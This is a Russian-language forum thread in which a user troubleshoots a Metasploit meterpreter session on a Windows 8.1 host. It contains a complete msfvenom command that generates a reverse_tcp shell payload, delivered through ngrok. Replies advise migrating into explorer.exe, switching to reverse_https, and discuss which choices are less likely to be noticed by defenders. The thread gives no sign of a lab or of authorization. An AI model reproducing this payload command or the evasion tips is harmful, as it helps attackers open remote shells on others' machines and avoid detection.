• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Metasploit ошибка

Tayrus

Grey Team
13.04.2017
275
395
#1
У меня шиндовс 8.1, создаю shell такой командой:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /root/shell.exe
Закидываю на хост, сессия прилетает, такие команды типо cd pwd ifconfig работают, а все остальные нет, не работает даже cat пишет:
[-] stdapi_fs_stat: Operation failed: Not enough storage is available to process this command.
PS делаю все через ngrok
[doublepost=1513656700,1513615871][/doublepost]UP
 

Tayrus

Grey Team
13.04.2017
275
395
#3
Попробуй мигрировать в другой процесс, сразу после получения сессии
Cпасибо, мигрировал в explorer.exe все начало работать, только когда пишу cd Desktop пишет такой директории нету, как зайти на рабочий стол?
 

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 232
2 723
#6
и лучше использовать /reverse_https - надежнее и устойчивее.
 
05.02.2017
183
241
#7
Спорный вопрос)) а если какими нибудь внутренними проксями запрещён 443?
 

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 232
2 723
#9
Спорный вопрос)) а если какими нибудь внутренними проксями запрещён 443?

tcp более подозрителен чем https, связь https держит стабильнее чем tcp, а если настроено внутренними проксями, там скорее всего подумали и об исходящем трафе в целом. Миграция в процес - это хорошо, но + к палеву ( если при помощи миграции решать ситуацию с обвалом связи ). Но как говориться - все индивидуально и по разному может сложиться.
 
Симпатии: Понравилось newbiee

Tayrus

Grey Team
13.04.2017
275
395
#10
tcp более подозрителен чем https, связь https держит стабильнее чем tcp, а если настроено внутренними проксями, там скорее всего подумали и об исходящем трафе в целом. Миграция в процес - это хорошо, но + к палеву ( если при помощи миграции решать ситуацию с обвалом связи ). Но как говориться - все индивидуально и по разному может сложиться.
А как может спалиться миграция?
 
Вверх Снизу